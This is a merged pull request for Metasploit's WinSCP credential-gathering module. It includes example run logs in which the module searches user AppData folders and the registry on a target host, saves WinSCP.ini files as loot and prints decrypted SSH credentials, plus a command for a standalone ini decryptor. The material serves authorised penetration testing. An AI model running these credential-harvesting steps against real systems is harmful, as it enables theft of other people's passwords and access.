### PR TITLE
Update WinSCP Gather

### PR DESCRIPTION
**Pull request by Meatballs1**
I had to manually parse a WinSCP.ini file so had to refactor the code to Rex to be able to use it outside of this module. There were a few updates the module could take advantage of which I have included.
- Refactor parsing to common library to support command line tool
- Look in APPDATA not just ProgramFiles (has this changed in WinSCP versioning or just because of Windows version?) Edit: Looks like if you're an admin it will use ProgramFiles, if not AppData...
- Iterate over all users APPDATA as well
- Store ini as loot
- Use client side hostname resolving
## Example Run

```
[*] [2015.08.01-20:51:03] Looking for WinSCP.ini file storage...
[*] [2015.08.01-20:51:04] Looking for C:\Users\All Users\AppData\Roaming\WinSCP.ini...
[*] [2015.08.01-20:51:04] Looking for C:\Users\bob\AppData\Roaming\WinSCP.ini...
[+] [2015.08.01-20:51:04] WinSCP.ini located at C:\Users\bob\AppData\Roaming\WinSCP.ini
[*] [2015.08.01-20:51:05] WinSCP saved to loot: /home/ben/.msf4/loot/20150801205105_default_192.168.153.131_winscp.ini_884026.txt
[-] [2015.08.01-20:51:13] Unable to store following credentials in database as we are unable to resolve the IP address: stdapi_net_resolve_host: Operation failed: 11001
[+] [2015.08.01-20:51:13] Host: test, IP: , Port: 22, Service: SSH, Username: test1, Password: password1
[+] [2015.08.01-20:51:13] Host: google.com, IP: 216.58.210.14, Port: 22, Service: SSH, Username: test, Password: password2
[+] [2015.08.01-20:51:13] Host: bbc.com, IP: 212.58.246.104, Port: 22, Service: SSH, Username: test, Password: password2
[*] [2015.08.01-20:51:13] Looking for C:\Users\Default\AppData\Roaming\WinSCP.ini...
[*] [2015.08.01-20:51:13] Looking for C:\Users\Default User\AppData\Roaming\WinSCP.ini...
[*] [2015.08.01-20:51:14] Looking for C:\Users\desktop.ini\AppData\Roaming\WinSCP.ini...
[*] [2015.08.01-20:51:14] Looking for C:\Users\IEUser\AppData\Roaming\WinSCP.ini...
[+] [2015.08.01-20:51:14] WinSCP.ini located at C:\Users\IEUser\AppData\Roaming\WinSCP.ini
[*] [2015.08.01-20:51:15] WinSCP saved to loot: /home/ben/.msf4/loot/20150801205115_default_192.168.153.131_winscp.ini_317377.txt
[-] [2015.08.01-20:51:17] Unable to store following credentials in database as we are unable to resolve the IP address: stdapi_net_resolve_host: Operation failed: 11001
[+] [2015.08.01-20:51:17] Host: test, IP: , Port: 22, Service: SSH, Username: test1, Password: password1
[+] [2015.08.01-20:51:17] Host: google.com, IP: 216.58.210.14, Port: 22, Service: SSH, Username: test, Password: password2
[+] [2015.08.01-20:51:18] Host: bbc.com, IP: 212.58.244.18, Port: 22, Service: SSH, Username: test, Password: password2
[*] [2015.08.01-20:51:18] Looking for C:\Users\Public\AppData\Roaming\WinSCP.ini...
[*] [2015.08.01-20:51:18] Looking for Registry storage...
[-] [2015.08.01-20:51:20] Error loading USER S-1-5-21-3463664321-2923530833-3546627382-1005: Hive could not be loaded, are you Admin?
[-] [2015.08.01-20:51:24] Unable to store following credentials in database as we are unable to resolve the IP address: stdapi_net_resolve_host: Operation failed: 11001
[+] [2015.08.01-20:51:24] Host: test, IP: , Port: 22, Service: SSH, Username: test1, Password: password1
[*] Post module execution completed
```

Standalone ini decryptor is ghetto but gets the job done.

```
ruby tools/winscp_decrypt.rb /home/ben/.msf4/loot/20150801205105_default_192.168.153.131_winscp.ini_884026.txt
/home/ben/.msf4/loot/20150801205105_default_192.168.153.131_winscp.ini_884026.txt
{:hostname=>"test", :password=>"password1", :portnumber=>22, :username=>"test1", :protocol=>"SSH"}
{:hostname=>"google.com", :password=>"password2", :portnumber=>22, :username=>"test", :protocol=>"SSH"}
{:hostname=>"bbc.com", :password=>"password2", :portnumber=>22, :username=>"test", :protocol=>"SSH"}
```
## Verification
- [x] Install WinSCP
- [x] Save a site with a password
- [x] Run module and check you retrieve values out of registry.
- [x] Check correctly stored in database.
- [x] Change Tools > Preferences > Storage to INI File
- [x] Save a site with a password
- [x] Run module and check you retrieve values out of INI file.
- [x] Copy WinSCP.ini to other APPDATA locations if you want to check user gathering
- [x] Try the command line ini parser.

### CODE REVIEW

**Comment by jlee-r7** [comment]
This is a perfect candidate for some specs.

**Comment by Meatballs1** [comment]
You think up some cruel and unusual punishments.

**Comment by jlee-r7** [comment]
@Meatballs1 :heart:

**Comment by Meatballs1** [comment]
Ask and you will receive! 

The specs even gave me the confidence to tidy up the decryption code as well. Go Specs!

**Comment by Meatballs1** [comment]
nb did a quick test against http://catfile.googlecode.com/svn/trunk/WinSCP/Data/settings/winscp.ini ...

**Comment by bcook-r7** [comment]
What are we waiting for here :) This looks good to me.

**Comment by bcook-r7** [comment]
```
 Looking for WinSCP.ini file storage...
[+] WinSCP.ini located at C:\Users\bcook\AppData\Roaming\WinSCP.ini
[*] WinSCP saved to loot: /Users/bcook/.msf4/loot/20151001143237_default_192.168.56.102_winscp.ini_282087.txt
[+] Host: monkey.com, IP: 23.229.167.198, Port: 22, Service: SSH, Username: monkey, Password: monkey
[+] Host: cow.com, IP: 69.162.80.55, Port: 22, Service: SSH, Username: cow, Password: cow
[*] Looking for Registry storage...
[+] Host: monkey.com, IP: 23.229.167.198, Port: 22, Service: Unknown, Username: monkey, Password: monkey
[*] Post module execution completed
```

**Comment by Meatballs1** [comment]
Thanks @bcook-r7  :D

**Pull request merged**
